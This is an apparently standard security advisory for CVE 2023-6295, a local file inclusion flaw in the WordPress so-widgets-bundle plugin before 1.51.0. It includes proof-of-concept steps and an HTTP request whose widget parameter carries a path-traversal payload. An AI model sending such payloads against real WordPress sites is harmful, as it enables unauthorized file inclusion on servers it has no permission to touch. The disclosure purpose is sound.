so-widgets-bundle < 1.51.0 – Admin+ Local File Inclusion | CVE 2023-6295

Description

The plugin does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.

Proof of Concept

1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the so-widgets-bundle plugin and activate it for the network
3. Login as said new administrator to the separate site (here: "site2" at "/site2/").
4. Navigate to Plugins -> SiteOrigin Widgets
5. Intercept the request when clicking on "Activate" or "Deactivate" of any widget. The request should look like this and provide the nonce:

POST /site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6 HTTP/1.1
Host: localhost
Content-Length: 127
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close

widget=../../../../../../../../../../../../../../../../../tmp/tmp&active=1